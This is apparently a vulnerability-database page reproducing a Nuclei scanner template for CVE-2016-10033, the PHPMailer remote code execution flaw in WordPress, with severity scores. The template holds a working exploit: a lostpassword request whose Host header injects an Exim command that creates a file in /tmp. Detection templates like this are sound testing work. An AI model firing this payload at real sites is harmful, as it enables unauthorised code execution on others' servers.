Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-10033
HistoryMar 24, 2021 - 11:33 a.m.

WordPress PHPMailer < 5.2.18 - Remote Code Execution

2021-03-2411:33:21
ProjectDiscovery
github.com
9

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.971 High

EPSS

Percentile

99.8%

WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.

id: CVE-2016-10033

info:
  name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
  author: princechaddha
  severity: critical
  description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected WordPress website.
  remediation: |
    Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability.
  reference:
    - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10033
    - https://www.exploit-db.com/exploits/40970/
    - https://www.exploit-db.com/exploits/40968/
    - http://seclists.org/fulldisclosure/2016/Dec/78
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-10033
    cwe-id: CWE-88
    epss-score: 0.97129
    epss-percentile: 0.99775
    cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: phpmailer_project
    product: phpmailer
  tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project

http:
  - raw:
      - |+
        GET /?author=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

      - |+
        POST /wp-login.php?action=lostpassword HTTP/1.1
        Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        wp-submit=Get+New+Password&redirect_to=&user_login={{username}}

    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - wp-login.php?checkemail=confirm

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        name: username
        group: 1
        regex:
          - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
        internal: true
        part: body
# digest: 490a00463044022033411a2aca61b97b205301cdb8eef8ef57c3467165cbe4c0c9a9c547cb8965e50220406a74e33b928a171ca810378162a6b315449d70e1b8059b12a752a0d61c2229:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.971 High

EPSS

Percentile

99.8%